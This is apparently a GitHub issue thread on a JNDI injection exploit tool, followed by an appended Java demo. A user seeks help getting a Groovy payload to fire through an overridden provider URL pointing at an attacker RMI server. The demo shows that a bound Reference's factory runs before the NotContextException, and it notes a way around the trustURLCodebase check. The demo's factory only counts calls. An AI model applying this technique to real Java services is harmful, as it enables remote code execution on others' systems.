JNDI-Injection-Exploit

javax.naming.NotContextException: rmi://54.x.x.x:1099/ngiawf at RegistryContextFactory.URLToContext

Open yahanvesh opened this issue 5 years ago • 3 comments

I have tweaked the code to use the new Groovy payload given by orange last month. However, in my use case I don't have a direct initialContext.lookup available. What I have is the path below. Right now it's failing at line 104 in http://cr.openjdk.java.net/~mduigou/7072353/3/webrev/src/share/classes/com/sun/jndi/rmi/registry/RegistryContextFactory.java.html#104

As the object sent back from the EVIL RMI server is not an instance of Context? Any suggestions on whether this can still be exploited?

javax.naming.NotContextException: rmi://54.x.x.x:1099/ngiawf
	at com.sun.jndi.rmi.registry.RegistryContextFactory.URLToContext(RegistryContextFactory.java:107) ~[?:1.8.0_222]
	at com.sun.jndi.rmi.registry.RegistryContextFactory.getInitialContext(RegistryContextFactory.java:69) ~[?:1.8.0_222]
	at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:684) ~[?:1.8.0_222]
	at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313) ~[?:1.8.0_222]
	at javax.naming.InitialContext.init(InitialContext.java:244) ~[?:1.8.0_222]
	at javax.naming.InitialContext.<init>(InitialContext.java:216) ~[?:1.8.0_222]
	at javax.naming.directory.InitialDirContext.<init>(InitialDirContext.java:101) ~[?:1.8.0_222]

yahanvesh avatar Apr 28 '20 19:04 yahanvesh

You are right, actually it's an instance of RemoteReference/Remote. About how to exploit "this", I don't totally follow you. What's the vulnerable code and which part can you control?

welk1n avatar Apr 29 '20 02:04 welk1n

@welk1n Does the exploit happen only with the call InitialContext.lookup()? I'll paste the code flow.

yahanvesh avatar Apr 29 '20 07:04 yahanvesh

In my application, I'm able to override the two params below: java.naming.provider.url, which I set to the RMI server generated by your code (rmi://54.x.x.x:1099/ngiawf), and java.naming.factory.initial=com.sun.jndi.rmi.registry.RegistryContextFactory

I have Groovy and Apache BeanFactory in the classpath, so I'm trying the execByGroovy payload. Java version: 1.8.0_222

Here is the code flow: config contains the overridden params above. makeDirectoryEnv basically sets these overridden values in the Environment.

1023  dirEnv = makeDirectoryEnv(this.getUrl(), config);
1024  dirCtx = new InitialDirContext(dirEnv);
...
(then after some lines)
1029  eventCtx = (EventContext) new InitialContext(dirEnv).lookup(config.getBaseDn());

1. I'm assuming the actual exploit happens at the lookup function? Is that the right assumption?
2. Secondly, right now it's failing at 1024 with the stack trace given above, so it's not even able to reach lookup. So in which case is it not possible to exploit?

yahanvesh avatar Apr 29 '20 19:04 yahanvesh
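The two code paths the thread is asking about can be reproduced locally without any remote server. In the JDK 8 sources, RegistryContextFactory.URLToContext resolves the provider URL through rmiURLContext.lookup, which calls RegistryContext.lookup on the object-name part of the URL (the "ngiawf" after the port); that call goes through RegistryContext.decodeObject and NamingManager.getObjectInstance, so a Reference bound in the registry is handed to its ObjectFactory before URLToContext checks whether the returned object is a Context and throws NotContextException. The example below is an added illustration of that, written for this page; it is not code from the issue, from JNDI-Injection-Exploit, or from the reporter's application. It binds a ReferenceWrapper in a registry started in the same JVM, runs the provider-URL path (the line-1024 shape) and then the root-URL-plus-lookup path (the line-1029 shape), and counts how often the factory runs. The class names ProviderUrlVsLookupDemo and MarkerFactory, the port 10099 and the use of a factory that is already on the classpath (standing in for the BeanFactory role discussed above) are assumptions for the demo; the factory deliberately returns a String rather than a Context.

```java
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.Name;
import javax.naming.NotContextException;
import javax.naming.Reference;
import javax.naming.directory.InitialDirContext;
import javax.naming.spi.ObjectFactory;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

/**
 * Added example for this issue thread (not code from the issue or from
 * JNDI-Injection-Exploit). Binds a Reference in a local RMI registry and drives
 * both JNDI code paths discussed above to show where the Reference is decoded.
 */
public class ProviderUrlVsLookupDemo {

    /**
     * Hypothetical factory that is already on the classpath. It only records
     * that it ran and returns something that is NOT a javax.naming.Context.
     */
    public static class MarkerFactory implements ObjectFactory {
        static volatile int calls = 0;

        @Override
        public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                        Hashtable<?, ?> env) {
            calls++;
            return "decoded:" + ((Reference) obj).getClassName();
        }
    }

    /** Environment with the two properties the reporter can override. */
    static Hashtable<String, String> env(String providerUrl) {
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY,
                "com.sun.jndi.rmi.registry.RegistryContextFactory");
        env.put(Context.PROVIDER_URL, providerUrl);
        return env;
    }

    /** Line-1024 shape: the provider URL itself names the bound object. */
    static int providerUrlPath(String urlWithObjectName) {
        try {
            new InitialDirContext(env(urlWithObjectName));
            System.out.println("unexpected: got a Context back");
        } catch (NotContextException e) {
            // URLToContext already looked the name up and decoded it by now.
            System.out.println("NotContextException: " + e.getMessage());
        } catch (Exception e) {
            System.out.println("other failure: " + e);
        }
        return MarkerFactory.calls;
    }

    /** Line-1029 shape: root URL as provider, then lookup() of the name. */
    static Object lookupPath(String rootUrl, String name) throws Exception {
        return new InitialContext(env(rootUrl)).lookup(name);
    }

    public static void main(String[] args) throws Exception {
        int port = 10099;            // assumed free local port
        String name = "ngiawf";      // bound name taken from the issue
        Registry registry = LocateRegistry.createRegistry(port);

        // Null factory location: the factory is loaded from the local classpath,
        // so the JDK 8u121+ trustURLCodebase check in decodeObject does not fire.
        Reference ref = new Reference("java.lang.String",
                                      MarkerFactory.class.getName(), null);
        ReferenceWrapper wrapper = new ReferenceWrapper(ref);
        registry.bind(name, wrapper);

        int callsAfterProviderUrl =
                providerUrlPath("rmi://127.0.0.1:" + port + "/" + name);
        System.out.println("factory calls after provider-URL path: "
                + callsAfterProviderUrl);

        Object result = lookupPath("rmi://127.0.0.1:" + port, name);
        System.out.println("lookup() returned: " + result
                + ", factory calls now: " + MarkerFactory.calls);

        // Unexport both remote objects so the JVM can exit.
        UnicastRemoteObject.unexportObject(wrapper, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

Run it on JDK 8 with `javac ProviderUrlVsLookupDemo.java && java ProviderUrlVsLookupDemo` (javac warns that ReferenceWrapper is internal API; on JDK 9 and later both commands need `--add-exports java.naming/com.sun.jndi.rmi.registry=ALL-UNNAMED`). The first path ends in the same NotContextException the stack trace shows, but the factory call counter it returns is already non-zero, because the Reference was decoded inside URLToContext before the instanceof Context check; the second path returns the factory's result directly from lookup(). Whether a given payload's factory does anything useful on the first path is a separate question about the factory, not about the NotContextException, which is only the last step.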